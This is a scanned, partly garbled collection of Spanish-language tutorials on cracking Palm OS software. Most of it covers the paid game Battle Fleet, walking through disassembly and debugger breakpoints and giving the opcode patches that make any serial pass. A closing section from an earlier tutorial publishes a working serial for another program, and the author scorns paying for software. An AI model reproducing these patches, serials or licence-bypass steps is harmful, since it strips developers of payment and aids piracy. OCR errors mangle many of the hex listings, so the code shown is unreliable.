00001f96 4e4fa192 sysTrapFrmAlert 

Por poco que nos fijemos, vemos en 

00001f6e 2800 L185 MOVE.L DO,D4 


que algo habla esa máquina de L185. Eso es una LABEL (etiqueta) y es algo que hace referencia a un punto en 
algún momento de la ejecución del programa. Más abajo tenemos la L186, que puse en negrita porque es una 
llamada a una Talt, la de error. La cosa está clara. El enemigo cae de rodillas agarrándose el pecho... Fijaos en 


00001f70 0c8300001b6d CMPI.L +7021!$1b6d,D3 
00001f76 661a BNE L186 

00001f78 0c8400000cfd CMPI.L +3325!$cfd,D4 
00001f7e 6612 BNE L186 


Eso tiene toda la pinta de decir "compárame nosequé y si no es igual salta a L186" (en este ASM, bne = branch not 
equal) y luego compara nosequé y lo mismo. No hay duda, el pobre chico pone una mano en el suelo. Está de 
rodillas y sangra en abundancia por el pecho. Nuestra estocada lo ha matado. Escupe sangre y musita: "Mi mujer, 

mi mu...". Limpiamos nuestro florete y con una mirada fría y sabia, distantes, recordamos que el serial de 8 numeritos 
se guardaba en dos campos, que son estos: 

00001f70 0c8300001b6d CMPI.L 47021 !$1b6d,D3 

00001f78 0c8400000cftd CMPI.L ++3325!$cfd,D4 

y que comprueba el primero (y de no cumplirse salta a L186, que es la carga en pila el mensaje de error) y hace igual 
al segundo. ¿Qué podrá ser el primer término de la comparación? Ese precioso 7021 y 3325 (resaltados en negrita). 
El triste adversario muere mirando al sol. 


7- DUELO POR SU MUERTE: 


Enciendo mi Palm, voy al programa y meto en el "Register" 7021-3325. De nada por registrarme. Lo compruebo en el 
emulador y también funciona. Es lógico: ordenador pequeño y programa pequeño = protección pequeña. Tan triste 
que estoy por desinstalarlo. En fin... 


8- AGRADECIMIENTOS: 


Por supuesto al canal IRC-HISPANO +fcrackers por aguantarme y por su apoyo y a todos ellos (ahora mismo, por lo 
que veo, Mr White, el bueno de Ziritione, el genio de eSn-min, Viktory, The Pope que es una autoridad, Sunevil, 
TGILITO, Blackdog, MetalSlug, Offset, birk, Seroculto y bueno, miles de ellos que no pongo porque, para que 
negarlo, me aburro) (jeje). Y ya sabéis, leed, leed, leed y pensad, pensad, pensad... sólo así seréis fuertes y libres. 
X-Grimator 25/01/02 PD: Por cierto, para ser mi primer tuto no me he enrollado mucho ¿no?. Es que en el canal de 
crackers me insistieron mucho que fuese muy muy clarito explicando. Bueno, perdonad si no os enterasteis de nada... 
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Palm CRACKER: X-Grimator wW/31/12/2004 


PROTECCION: NAME / SERIAL 


INTRODUCCION 


Para todos vosotros, niños y niñas, jóvenes y ancianos, civiles y militares sin graduación,ahora y en directo, 
el segundo tutorial en español sobre Palm Cracking por vuestro estimado amigo y compañero X-Grimator... 
RECAUCHUTANDO CODIGOS 


¡¡Hola a todos, gamberros!!... ¡damas y caballeros, bienvenidos al circo de variedades del domador X- 
Grimator, donde podrán contemplar mujeres barbudas, enanos deformes, códigos de Palm e instrucciones en 
Motorola ASM!. 

AL ATAQUE 


1- Introducción: 

Bueno, de nuevo vamos a meternos de narices en el apasionante mundo del Palm Reversing y las desastrosas 
consecuencias que ello puede tener para la salud de aquellos a los que no le gusta que pensemos por nosotros mismos. 
Ni que decir tiene que la explicación de lo que es una Palm ya la expuse en el primer tuto y a él me remito en lo tocante 
a eso (RTEFM, “read the fucking manual” o en lengua cristiana, “lee el jodido manual”). No voy a perder ni mi tiempo ni 
el vuestro repitiendo lo mismo. La idea que vamos a desarrollar en este tuto es la de parchear un programita para que se 
registre sin problemas con cualquier serial que le metamos. 

2- El objetivo: 

Un juego de barcos llamado Battle Fleet. Que por cierto, hay que ser canalla para hacer un juego de guerra de barquitos 
y cobrar por ello. Esas cosas deberían ser freeware. Es como si yo ahora comercializo un juego de ordenador que vaya 
de canicas o peonzas. Eso está feo y no se hace, y sólo por ello debería calcinarse el programador en las llamas del más 
tórrido infierno (que por lo que sé, debe ser una oficina de Hacienda o una consulta de un dentista, je, je...). Si queréis 
localizar el juego, no tenéis más que hacer uso y disfrute del Google, el mejor invento de la Humanidad después del 
papel higiénico. Imaginaos un mundo sin papel higiénico o sin Google... puafff, que grimaaaaaaaaaaa... 

3- Las herramientas: 


En Palm tenemos muy pocos tutos sobre estos temas y menos herramientas todavía. Pensé meteros en este ensayo las 
herramientas como hice en el anterior pero al final sólo logro que el zip ocupe más, así que os recomiendo que busquéis 
en Internet que por algún sitio aparecerán. En este caso, nuestra carpa de circo se va a nutrir de... 

a) El prestigioso acróbata PalmdeMon 0.24, que con su capacidad de desensamble nos permitirá ir dando saltos por el 
código. 

b) El mundialmente conocido ilusionista, recién llegado de la misteriosa India, Prc2bin,único en convertir archivos .pre 
de Palm en binarios. 

C) El hombre de acero, de músculos pétreos capaz de arrancarle la cabeza a un toro, PilotDis.Sólo él sabe coger un 
archivo y arrancarle los intestinos para que aparezca desensamblado. 

d) El poder de la mente, la ciencia de la telepatía tiene su cúspide en Prcedit 1.0 b2. Con su concentración logrará saber 
todo lo que contiene la mente de un archivo .pre y cambiar muchas cosas de ella. 

e) Y el domador de fieras y payaso, X-Grimator. Sin esta herramienta, no hay tutorial. De todos modos no olvidéis que 
esto del crackeo es un arte en continua evolución e innovación,así que cualquier otra herramienta que conozcáis o 
aparezca en mercado, será bienvenida.No le hagáis ascos tampoco a PrcExplorer 1.0.14, es una pasada. Dios, lo que 
inventa la gente que piensa... bufff.. 


.4- ¡¡Comienza el espectáculo!!: 

Chim-pata-chim pata-chimmmmmmmmm... Lo primero que vemos, avezados crackers de Palm, es que sin el Palm Os 
Emulator o sin un dispositivo PDA difícilmente podemos crackear el programa, así que ni cortos ni perezosos, nos 
vamos a www.palm.com y nos downloadeamos el emulador, que es gratuito y una preciosidad. A mí me cae muy 
simpático... Una vez hecho esto, Instalamos Battle Fleet (que nos habremos bajado de algún sitio) y tras ejecutarlo nos 
vamos directos a la pantallita de “register” donde metemos un número basura cualquiera (insisto en mi consejo: no hay 
nada mejor que meter vuestro DNI. A la hora de debuggear es un número que reconoceréis a la primera y que no da 
lugar a error con otras cadenas de números... ¡¡ayyyy la sabia experiencia del vetusto ingeniero inverso!!). 


Registration 
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software Your registration 
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Registration code: 
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Cancel |] 
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period. Don't miss any 
action, please register 
today. 


La madre que lo parió... no acertamos el serial válido... será desgraciado.En fin, visto que la fiera se nos pone 
enrevesada, el domador X-Gri saca el látigo negro de seis colas y se dispone a azotar con toda su rabia. Para ello va a 
usar a su mejor telépata e hipnotizador: Prcedit. Ejecutamos Preedit y cargamos el jueguecito en él. Ummmm, parece 
que nos abre un montón de cosas en la ventana de la izquierda... ummmm. Como ya sabemos del primer tutorial, lo que 
nos interesa averiguar es qué mensaje de alerta nos ha aparecido.El telépata nos dice, casi con sagaz certidumbre que la 
Talt 1900 es la que buscamos. Y hasta nos permite modificar el texto de la ventanita... esto me da una idea para un 
futuro keygen donde la propia ventana nos cante el serial correcto... quizá sea la segunda parte de esta lección, no sé... 
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Bueno, ya sabemos gracias a esto que la Talt1900 es la que nos chiva el error “Demo mode”... como si no lo 
supiésemos. Este Jim Love ni siquiera nos dice que el serial es incorrecto.Si hasta pretenderá despistarnos y todo el 
pobre... Lo mejor es eso que dice de que si te registras podrán crear grandes juegos... ¡será soberbio el capullo ese del 
Jim Amor!... con ese nombre igual es mariquita y todo... Un Ok más y volvemos a la ventana principal del juego. 
Bueno, ya sabemos la táctica de nuestro enemigo. Veamos como se comporta ante la magia... 


5- Magia potagia: abracadabra pata de cabra, quiero que Prc2Bin me facilite las cosas: 


Pues nos toca tragarnos el código muerto para ver como funciona el tinglado éste. Y en este punto de las cosas, nadie 
mejor para ayudarnos que nuestro chamán del ilusionismo y la magia oscura de los hindis... Prc2bin. 

Desde una ventana de consola DOS, abrimos Pre2bin y tecleamos Prc2bin BattleFleet.pre Y pummmm lo que era una 
chica del público sin complicidad alguna con nuestro mago, se convierte por arte de birlibirloque en una preciosa 
colección de archivos dónde solo nos interesarán dos de ellos: Talt1900 (sólo para editarlo con un editor cualquiera de 
texto y comprobar que efectivamente es lo que buscamos. El 1900 está en hexa, así que será Talt076c), y el code0001, 
que es el código propiamente, donde tenemos el tomate... Muchas gracias Prc2bin, tu número ha sido fascinante. 
Aplausos por favor, y que no decaiga la expectación que ahora comenzamos con el número de fuerza. 


6- ¡¡Quiero verte las tripas!!: 


Haciendo balance de lo que hemos hecho hasta ahora, tenemos lo siguiente: un mensaje de error localizado, el nombre 
del archivo de tal mensaje y el código que tenemos que tragarnos. Hombre, se puede considerar ya un avance ¿no?, pero 
es el momento de la actuación de PilotDis. Temblad, pequeñines... 

Ni cortos y mucho menos perezosos, nos vamos a una consola de DOS y de ahí al directorio donde tengamos PilotDis y 
en el que habremos metido el archivo code0001.bin. Una vez hecho esto, tecleamos Pilotdis code0001.bin y nos aparece 
un archivo llamado code0001.bin.s, que podemos editar con cualquier editor de texto, el Block de Notas, por ejemplo. 
Santo Cristo, que sangría se va a montar aquí... tenemos 


ya el código desensamblado. El pseudo-animal de PilotDis le ha arrancado las vísceras al programita entre risas y 
alaridos sádicos de placer (tengo que dejar de ver películas de serie B que luego sueño). Es esto lo que nos interesa, así 
que vamos a analizar el código y olvidarnos de lo demás. 

Comenzamos la fase zen-cracking, así que las instrucciones ahora son: 

1- No pienses en más archivos que en el que estamos analizando. 

2- Descuelga el teléfono y cancela tus citas (esta idea es de Látigo). 

3- Prepárate un whiskila o un vodkila, como hacemos en el canal Hcrackers. Importante que el tequila sea de calidad. 
El whisky o el vodka... bueno, tal y como sabe esa historia no es tan importante... 

4- Piensa mucho y ten más calma si cabe. Estiro las piernas, pongo música para la ocasión y con el Block de Notas 
delante y code0001. bin.s, me dedico a buscar el siguiente string: 

$76c 

parece ser que esto significa que se está metiendo en la pila el mensaje 76c, que es el Talt1900 que habíamos localizado 
antes. El mensajito en cuestión parece que se carga muchas veces, pero sólo nos interesará ésta: 


00007fca 4e4fa153 sysTrapFIdGetTextHandle ? lee mi serial basura por 1* vez 

00007fce 2448 MOVEA.L A0,A2 

00007fd0 200a MOVE.L A2,D0 

00007fd2 584f ADDOQ.W +4,A7 

00007fd4 671c BEQ L870 ? de ser 0 me salta (debugger me dice que no salta) 
00007fd6 2f0a MOVE.L A2,-(A7) 

00007fd8 4e4fa021 sysTrapMemHandleLock 

00007fdc 584f ADDQ.W +4,A7 ?esto es una corrección de pila 

00007fde 2f08 MOVE.L AO,-(A7) 

00007fe0 486dfbca PEA -1078(A5) 

00007fe4 4e4fa0c5 sysTrapStrCopy 

00007fe8 2f0a MOVELL A2,-(A7) 

00007fea 4e4fa022 sysTrapMemHandleUnlock 

00007fee 4fef000c LEA 12(A7),A7 

00007ff2 4ebas570 L870 JSR L56 ? RUTINA ”CHECKREGISTRATION” (vaya, vaya...) 
00007ff6 2b40fd66 MOVE.L DO,-666(A5) 

00007ffa Ocad00000 14afd66 CMPLL +t330!$14a,-666(A5) 

00008002 6410 BCCL871 ? BRANCH IF CARRY CLEAR -C 


A ESTE TROZO DE CÓDIGO NO LLEGAMOS SI NOS PASARON YA LOS 7 DIAS DE PRUEBA 


00008004 3£3c07d0 MOVE.W +t2000!$7d0,-(A7) ?DEMO EXPIRED (si ya pasó el trial de 7 días) 
00008008 4e4fa192 sysTrapFrmAlert 

0000800c 38bc0016 MOVE.W +t22!$16,(A4) 

00008010 544f ADDQ.W +2,A7 

00008012 6074 BRA L876 


00008014 Ocad00000198fd66 L871 


CMPLL ++408!$198,-666(A5) 


0000801c 6314 BLS L872 ? SALTA SI ES LOWER O SAME THAN C/Z 
(no salta) 
0000801e 3£3c076c MOVE.W ++1900!$76c,-(A7) ?DEMO MODE FOR 7 DAYS (BAD BOY) 


¡¡APAREZCO AQUÍ!!! 


Una cosa que debemos apuntar aquí es el estudio de la línea 


00007ff2 4eba8570 


L870 JSR L56 


? RUTINA ”CHECKREGISTRATION” 


aunque al desensamblar no la vemos exactamente así, si utilizamos el debugger que viene con el emulador de Palm y 
que se llama Palmdebugger (¡¡cielos, qué originales son los zombiprogramadores!!) observamos que la rutina de la 
Label 56 tiene ese nombre 


Para los que no lo sabéis, aunque esto sólo es un adelanto para próximas lecciones, el debugger se ejecuta lanzándolo 
con el comando 

att 

y los breakpoints en las apis se ponen como 

atb “nombre systrap” 

pero eso es otra historia que de momento no viene a cuento. Por cierto, una “label” es algo igual a un proceso, o una 
subrutina de la principal. Y JSR es un salto obligatorio hacia esa rutina. Bien, bien... podemos también usar a nuestro 
fabuloso malabarista PalmDeMon para dar saltitos de ranita por el código. Os pongo una pantalla para que os hagáis 
una idea de la potencia que puede llegar a tener este saltimbanqui: 


pines de 2 A 0 /PA TE Oecunens 0 settia)s Amor ado Escribano Er PROCESO CHACO 


mManaya 69) 


momia? a 
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pues aquí vemos un trocito del código que andamos revolviendo pero puesto bonito,para los que no os guste el encanto 
cutre del block de notas. El PalmDeMon es un pedazo desensamblador hecho por Carpathia que lamentablemente lleva 
parado un par de años. Con los botoncitos de arriba podemos ver las alertas, las llamadas a apis del la Palm (las famosas 
systrap) etc... una joya vamos, para que juguéis un poco... 

7- Guay tío, mola, dabutén, fetén, pero no me entero de nada... 

Vale, vale, ya sé que me enrollo demasiado... vamos a meternos en harina. Le damos un sorbito al whiskila y 
empezamos a mirar código y código: 


00007ff2 4eba8570 L870 JSR L56 ? RUTINA ”CHECKREGISTRATION” (vaya, vaya...) 
00007ff6 2b40fd66 MOVE.L DO,-666(A5) 

00007ffa Ocad0000014afd66 CMPLL +330!$14a,-666(A5) 

00008002 6410 BCC L3871 ? BRANCH IF CARRY CLEAR -C 

00008014 Ocad000001981fd66 L871 CMPLL +t408!$198,-666(A5) 

0000801c 6314 BLS L872 ? SALTA SI ES LOWER O SAME THAN C/Z (no salta) 
0000801e 313c076c MOVE.W ++1900!576c,-(A7) DEMO MODE FOR 7 DAYS (BAD BOY) 


¡¡¡¡APAREZCO AQUÍ!!! 


Yo aquí veo lo siguiente, es decir, un salto obligatorio a una label que encima se llama “checkregistration” o sea, de 


penita penita pena. Un par de líneas después me compara 330 decimal (14a hexa) con el registro aS-666. Aquí debo 
hacer una pequeña pausa para recordaros que en Motorola la ruta fuente-destino se lee al revés que en ASM x86, es 
decir : 


MOVE.L DO, -666(A5) 


significa que movemos el contenido de DO (tenemos como registros de datos DO hasta D7, y como registros de 
direcciones AO a A6, ya que A7 es la pila), digo que movemos DO con tamaño Long (doble word) a la dirección AS 
menos 666. Bueno, después de esta breve explicación, seguimos diciendo que si la comparación no sale como debiera, 
me pega un salto a la label 871 que me hace otra comparación y que me manda directo a la orden de que salga el 
mensajito de bad boy. Para no aburriros demasiado, deciros que BLS significa branch lower same, que quiere decir, 
menor o igual al flag Z (cero) y BCC significa branch if carry clear —c. Esto es, dos saltos condicionales. Vaya vaya... 
por último, aunque no la puse, la siguiente línea sería 


00008022 4e4fa192 sysTrapFrmAlert 


que ya muestra el mensaje de alerta en la pantalla y que es la llamada a la api para esas cosas de mal vivir. Respecto al 
primer salto, el de 


00008002 6410 BCC L371 ? BRANCH IF CARRY CLEAR -C 


no le damos más importancia, ya que es el que mira si pasaron o no los 7 días de prueba, y que nos llevaría a una 
ventanita de “Demo expired!” tan odiosa y que todos vimos alguna vez. Precisamente estaría una línea más abajo. En 
cuanto al segundo salto, el de: 


0000801c 6314 BLS L872? SALTA SI ES LOWER O SAME THAN C/Z (no salta) 


el bueno de X-Grimator fue de campeón pensando que sabía mucho y ni corto ni perezoso le metió un pedazo BRA 
(salto obligatorio, salta siempre) que no valió para nada: no salía el mensajito malo pero no se registraba al volver a 
entrar. La típica trampa de elefantes, más grande que las mentiras que dice X-Gri para disimular que tiene resaca un 
domingo delante de sus padres. NOPear el salto BCC tampoco sirvió de nada. Sólo quedaba enfrentarse al Check 
Registration. La batalla sería dura. 

8- Duelo en la carpa. Payasos asesinos: 

Otro sorbito al vodkila (tengo dos vasos con distinta bebida, es que no me decidía) y nos vamos de cabeza a pelear con 
la rutina de chequeo. Cuerda floja ¡¡sin red!!. 

Si observamos en L56 (la rutina de chequeo) encontramos al principio esto: 


00000610 4e4fa2a9 sysTrapDIkGetSyncInfo ?OBTIENE MI USER ID DEL HOTSYNC 
00000614 486dfbal PEA -1119(A5) 


hasta aquí podemos llegar buscando en el Block de notas “L56” en el código. La primera línea es la llamada a la api 
para leer nuestro nombre de registro en el Hotsync, nuestro ID de User, como en Windows cuando te pide usuario y 
empresa. En la segunda línea estamos cargando y haciendo apuntar la pila a a5-45f. Si en el debugger mirásemos esta 
dirección, veríamos el UserID que usamos para conectar datos de la Palm al PC. Hummmm, así que el serial no nos 
vale igual a todos ¿eh?. Buen dato. El Sr. Love ha hecho un keygen que calcula el numerito. 

No está mal, esto es más interesante que el primer tutorial...Bueno, después de mucho código que os ahorro, la rutina de 
chequeo (tras haber tomado letra a letra del ID y haber calculado el número correspondiente) llega a esto: 


0000079a 486dfbca PEA -1078(A5)  ? y a5-436 es mi serial basura 
0000079e 486eff7e PEA -130(A6) ? y a6-82 es “UBF11415-8014611200” 


los PEA, como dijimos, cargan un valor y hacen que el puntero se fije en ellos. Son importantes. Y da la casualidad que 


tenemos dos seguidos. Y pardiez, el segundo es pero que muy extraño... ¿me entendéis verdad?... pero de momento, 
dejemos esto para ir a algo más sencillo. Seguimos bajando hasta 


000007e8 4a2eff'77 L63 TST.B -137(A6) ? compara byte de a6-89 con cero 
000007ec 672a BEOQ L64 ? si es igual, salta (no lo hace) 
000007ee 0c840000014a  CMPLL ++330!$14a,D4 ? compara 14a con D4 
00000714 6422 BCC L64 ? D4 está vacio y por ello no salta 
000007f6 283cC0000014a MOVE.L +t330!$14a,D4 ? mueve 14a a D4 


El salto BEQ y la comparación son lo que nos interesa recauchutar, y lo haremos así: 


000007ec 4e71 NOP 
000007ee 283c0000014a MOVE.L +t330!$14a,D4 


y con esto conseguimos que no realice nada cuando debería hacer el salto “igual a” hacia L64 y además desmontamos la 
comparación. Para poder hacer esto, cogéis vuestro editor hexadecimal favorito y cambiáis los opcodes (resaltados en 
negrita). Con esto habremos logrado que cualquier número sea aceptado por válido en nuestro querido y apreciado 
jueguecito. 


9- The End y saludos: 


Lo divertido se acaba muchachotes. Bueno, estoy seguro de que esto no le interesa a demasiada gente, pero bueno, así 
de duras son las cosas. Si lograsteis llegar hasta aquí, es que vuestro whiskila está ya vacío. Y si está vacío es que no os 
habéis enterado de nada y estáis beodos perdidos. Si vuestro whiskila/vodkila no está vacío es que no llegasteis hasta 
aquí, y por lo tanto tampoco pudisteis enteraros de cómo acababa esto. Ya sea por h o por b, no os habéis enterado. 
Total, nadie tiene una Palm... Y para acabar, un saludo muy grande a Látigo por abrirme los ojos a este tipo de crackeo 
(suerte en tu búsqueda de empleo, chico. Europa no anda mejor que tu tierra) y a toda la gente del canal H+cracker del 
IRC-Hispano por aguantar mis locuras. Un saludo en especial a eSn-mIn por haberme mencionado en su tutorial de 
Asprotec. Eso no quiere decir que me olvide de Nette, remains, jonas, mrsilver, TGILITO, ShOtGan, juassss, khanete, 
suNeVil, y miles de ellos que ahora olvido pero que me ayudan constantemente con su experiencia y paciencia. 


30/05/2002 

Y por nada del mundo olvidéis el mayor lema cracker: “Pensad, pensad, pensad...”. Desde que descubrí esto del 
crackeo, me aburren los juegos de estrategia... y a ver si los que el día de mañana llegáis a ser programadores os 
dedicáis a hacer protecciones un poco serias, y no las cochinadas que hace el Jim Love éste. 

X-Grimator 
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Palm Spanish Tutor 


INTRODUCCION 


¡¡Mis saludos, pequeñas sabandijas, gusanos de la programación, amebas de las ciénagas del ASM!! Este 
tutorial va dedicado a vosotros, los malditos, los hijos bastardos de un dios menor, los desarrapados, 
perseguidos por lo "políticamente correcto",los odiados, los temidos, los nefandos y oscuros delincuentes que 
maquinan confabulaciones contra Gates y su prole de refulgentes dioses del dinero y nuevas tecnologías. 
Este tutorial va dedicado a mis amigos, los crackers, ingenieros inversos, aquellos desheredados que solo 
quieren aprender, a los que se les niega el conocimiento, a los frekies feos y gordos, bebedores de coca cola y 
guarradas con alcohol, a los deshechos de un mundo que se ha vuelto loco y codicioso, a los que realmente 
son seres humanos, con afán de superación y evolución, con la suficiente paciencia como para leer ASM y 
modificarlo, a los nauseabundos piratas cuyo delito es preguntar y curiosear. Este tutorial va dedicado a 
vosotros...¡¡mis maestros!!. Y después de esta agresiva y romántica introducción pasemos a... 


AL ATAQUE 
INTRODUCCION: 


Apenas decir que este tuto es la continuación del anterior en el que parcheamos el programita y por el camino nos 
encontramos el serial y toda la rutina de checksum. Me remito a lo que dije sobre las herramientas necesarias para llevar 
a buen término este barco pirata... 

BATTLEFLEET 1.0 SEGUNDA PARTE: 

La película nos había dejado intrigados con un bonito parche que hacíamos una vez desensamblado el programita y por 
el camino nos había dado por utilizar PalmDeMon y el debugger tan simpático que nos regala PalmOs (son tan buenos 
y nos quieren tanto que regalan programas... por si acaso, yo no me fio mucho... ahí hay truco seguro...). Pero bueno, 
salimos del cine, con los ojos rojos y medio zumbados después de tres horas de peli y directos al McMierda a comer 
una hamburguesa, un colega nos mira a nuestra cara de pobres diablos y nos espeta a la cara: "tío, no me he enterado de 
la mitad del argumento" y nosotros, almas cándidas, suspiramos mirando al cielo y armados de paciencia le explicamos 


por qué Norman Bates se disfrazaba de su madre para cargarse chicas que caían en su hotel: "Manu, macho, es que era 
drag-queen, una locaza...”. A ver, te explico... 

Y CUANDO ESTAMOS DEBUGGEANDO 

Si mal no recordáis, en el último tuto habíamos hecho una serie de pasos hasta llegar al debugger. Como temo repetirme 
y aburriros, os los resumo a grandes rasgos: 

1- Desensamblado el programita, buscamos el Talt del mensaje malo y feo y lo localizamo s. Para hacer 

bien este punto uno, leeos mis otros dos tutos. 

2- Tras echar un vistazo, notamos una llamada a la label 56, que es la del checksum. En PalmDeMOn también lo vemos 
claro. Lástima que Carpathia haya desaparecido de la arena, necesitábamos un desarrollo más profundo de esa 
herramienta :0( Los buenos desaparecen, mueren en las inmensidades del mar del olvido, bailando y bebiendo con las 
sirenas por la eternidad. Ya se me salta una lagrimita... debo ir viejo... 

3- Fieles a nuestro desmedido afán de conocimiento e insaciable sed de sabiduría, ejecutamos PalmOs emulator y 
cargamos el programa. Aquí me voy a parar un poco y retomamos la milonga esta... 

ENTONCES ES CUANDO DESCUBRE SU LADO FEMENINO, MIRANDO EL CUCHILLO DE COCINA 

Hasta ahora el PalmOs emulator lo he mencionado de pasada. Es muy bueno, creedme, y lo podéis descargar 
gratuitamente desde la web de Palm. Es la nueva versión del antiguo Pilot, y juro que es de los mejores emuladores que 
he visto en mi vida. Os recomiendo echarle un ojo. (Hummmm... a veces me pregunto si alguien leerá mis tutos o si 
serán útiles). Bajaos también PalmDebugger de la web de Palmos, si no, difícilmente podremos meternos con listado 
vivo. 

Ejecutamos el Emulator de marras y vemos algo asi como que nos sale una ventanita pidiéndonos una ROM y tamaño 
del archivo que se va a crear virtualmente. Las ROMs las podemos obtener de nuestra Palm, de alguna web de warez 
(yo miraré a otra parte, os lo juro) o descargándolas de PalmOs pidiendo permiso y firmando una licencia y eso. Bueno, 
elegimos nuestra ROM y cualquier tamaño de RAM para la supuesta capacidad de memoria de nuestra Palm virtual. 
Poner una carátula bonita hace más agradable nuestro trabajo. 

Acto seguido, arrancamos la máquina y tras tocar con el ratón diversos puntos de la pantalla para calibrarlo y precisarlo, 
nos vemos de lleno en la ventana inicial de la Palm (¿he dicho "ventana"... oh, Dios, ¡¡soy carne de Gates!!). Botón 
secundario del ratón y le damos a instalar aplicación, donde escogeremos BattleFleet.Es to va por gustos, pero si 
escogéis otra aplicación de poco os sirve este tuto, je je... Luego le damos a HotSync y pulsando el icono de la casita de 
abajo volvemos a la pantalla principal. Juas, ahora empieza el tiroteo. 

Cargamos el debugger y tras ejecutarlo con: 


att (y luego enter.Fijaos bien que en el menú de Connection esté seleccionado el Emulator) tecleamos: 

atb "FrmAlert" 

que en lengua no-hereje significa algo así como: 

bpx "MessageBox" 

que para los que estudiaron Humanidades se traduce como: 

párate cuando aparezca un aviso 

Tras escribir eso, ponemos: 

g 

que es el comando que nos permitirá volver a nuestro amado emulador. Para los curiosos, la g es de "go". ¡Uau!, 
apabullante razonamiento ¿verdad?. Y sin comerlo ni beberlo estamos en el PalmOs Emulator como quien no quiere la 
cosa. Ya tenemos una systrap husmeando el aire para saltar de un momento a otro. Tocamos con el raton encima del 
juegoobjetivo de nuestro estudio para que se ejecute y vemos un horrible dibujo de un gorila (el John Love este creo yo 
que andaba un poco pasado de LSD cuando programó la mierda esta...) y se nos carga el Battle- Fleet sin problemas. 
Vamos a registration, metemos un número fake ("basura" en lengua cristiana) y le damos a aceptar. 

NOTA: si en algún momento de este proceso saltase el debugger, basta con poner 

g 

y continuar como quien no quiere la cosa. Fácil... 

Bueno, llegados a este punto, chis -pum, bloqueo de emulador y debugger sonriente, peinado con raya al medio y 
reluciente de gomina. Buen cazador, el chico, ha dado de lleno con un FrmAlert interesante. Tres anotaciones en este 
punto: 

1- Poned el atb antes de cargar el programa objetivo. 


2- El PalmDeMOn abierto a la vez, en listado muerto, os ayudará mucho a no perderos. Veis perfectamente 
dónde andáis. 
3- Ummm, éste se me olvidó... x) 


Y NO VEAS, TIO, LA COCHINADA QUE HIZO CON EL CUCHILLO DE COCINA Y LA DE 

SANGRE QUE SALTABA 

Ahora, al fin, estamos propiamente en el tema de este tutorial. Vamos a localizar nuestro número fake (esta palabreja la 
aprendí en el ircnet en Hpalmwarez, pero no os recomiendo ir ahí, son muy desagradables. Más majos son los chicos del 
irc-hispano en *crackers y si no, como ejemplo pongo a SunEvil, cybdan, TGILITO, DS, jonas_, juasss o a eSn-mIn). 
Digo que buscaremos nuestro serial basura, veremos cómo lo halla y haremos un keygen. Como dijo Jack el 
Destripador, "Vayamos por partes". 

1- El numerito: 


Con el atb que pusimos aparecemos en la siguiente sección de código: 


0000801c 6314 BLS L872 

0000801e 3£3c076c MOVE.W ++1900!$76c,-(A7) 

00008022 4e4fa192 sysTrapFrmAlert 

y si observamos el listado muerto, no se nos escapa otro FrmAlert más arriba en 
00008004 3f3c0740 MOVE.W ++2000!$7d0,-(A7) 

00008008 4e4fa192 sysTrapFrmAlert 

0000800c 38bc0016 MOVE.W ++22!$16,(A4) 


ese es el mensaje de bad boy, el de "Demo Mode for 7 days". Ahora os pongo el código que nos interesa,que es: 


00007fca 4e4fa153 sysTrapFldGe tTextHandle 
00007fce 2448 MOVEA.L A0,A2 

00007fd0 2004 MOVE.L A2,D0 

00007fd2 584f ADDQ.W +4,A7 

00007fd4 671c BEQ L870 

00007fd6 2f0a MOVE.L A2,-(A7) 

00007fd8 4e4fa021 sysTrapMemHandleLock 
00007fdc 584f ADDQ.W +t4,A7 

00007fde 2f08 MOVE.L AO,-(A7) 

00007fe0 486dfbca PEA -1078(A5) 

00007fe4 4e4fa0c5 sysTrapStrCopy 

00007fe8 2f0a MOVE.L A2,-(A7) 

00007fea 4e4fa022 sysTrapMemHandleUnlock 
00007fee 4fef000c LEA 12(A7),A7 

00007ff2 4eba8570 L870 JSR L56 

00007ff6 2b40fd66 MOVE.L DO,-666(A5) 
00007ffa Ocad0000014afd66 CMPI.L +t330!$14a,-666(A5S) 
00008002 6410 BCC L871 

00008004 3f3c0740 MOVE.W ++2000!$7d0,-(A7) 
00008008 4e4fa192 sysTrapFrmAlert 

0000800c 38bc0016 MOVE.W +t22!$16,(A4) 
00008010 544f ADDQ.W +2,A7 

00008012 6074 BRA L876 

00008014 Ocad00000198fd66 L871 CMPLL +408!$198,-666(A5) 
0000801c 6314 BLS L872 

0000801e 3£3c076c MOVE.W ++1900!$76c,-(A7) 
00008022 4e4fa192 sysTrapFrmAlert 


de ahí abajo ya no llega la ejecución del programa. Os he resaltado las sentencias que nos saltamos siempre que estemos 
en el trial de los 7 días para probarlo. Mirando tan solo las cosas que nos interesan aquí, tenemos que 
00007fca 4e4fa153 sysTrapFldGetTextHandle 


lee nuestro serial basura por primera vez. Luego, ya a la altura de 

00007fd6 2f0a MOVE.L A2,-(A7) 

nuestro fake serial anda por el registro de datos AO y el de direcciones AO (recordad que A7 es la pila). 

ESo lo sabemos tecleando 

dm A0 

y nos enseña la memoria del registro AO. otros comandos útiles son 

il 

que nos muestra las 10 siguientes líneas de código, 

S 

de "step" que nos permite ejecutar una línea de código en el debugger y 

t 

que ejecuta una línea pero saltando por encima de las funciones (de "trace"). 

Bueno, entonces "¿ese Norman Bates realmente crees que estaba loco?". No entendisteis nada... 

¡arggg8g88!. 

Esta es la línea de código en la que aparezco 

0000801e 3£3c076c MOVE.W ++1900!$76c,-(A7) 

a lo que llego después de que 

00007ffa Ocad0000014afd66 CMPI.L +t330!$14a,-666(A5S) 

00008002 6410 BCC L871 

una comparación me lleva a la Label 871 si el registro AS-666 (en hexa sería la dirección A5-29a) no 

contiene nada. Significa Branch if Carry Clear. 

Así que si en 00007fe8 vemos mi serial basura en AO y DO, en 00007ff2 me salta obligatoriamente a la 

Label 56 y en 00007ffa hay una comparación (que como dice mi madre son siempre odiosas) entonces... 
¿¿qué diablos pasa con la Label 567?. Sólo vosotros, Dios y John Love lo saben. Es nuestro Checkregistration. 
Bueno, ejem, el debugger también lo dice, pero eso es otra historia X) 

2- Cómo lo halla: 

Para saber dónde pararnos debemos utilizar el código muerto a la vez que el vivo, asi que miraremos 

posibles SysTrap del codigo muerto para poner atb estratégicos que nos vayan cantando lo que tienen los 
registros, así que ni cortos ni perezosos, le introducimos 

g 

al debugger para salir del proceso, borramos los atb con 

ate 

(atd nos muestra todos los breakpoints) y volvemos a la ventanita principal de Palm saliendo antes del programa. Si 
hubiese algún problema, basta con re-conectar el debugger con att o saliendo y cargando de nuevo todo desde el 
principio. Pero ahora los atb serán más astutos y no perseguiremos la usada Sys-TrapFrmAlert (nota importante: el 
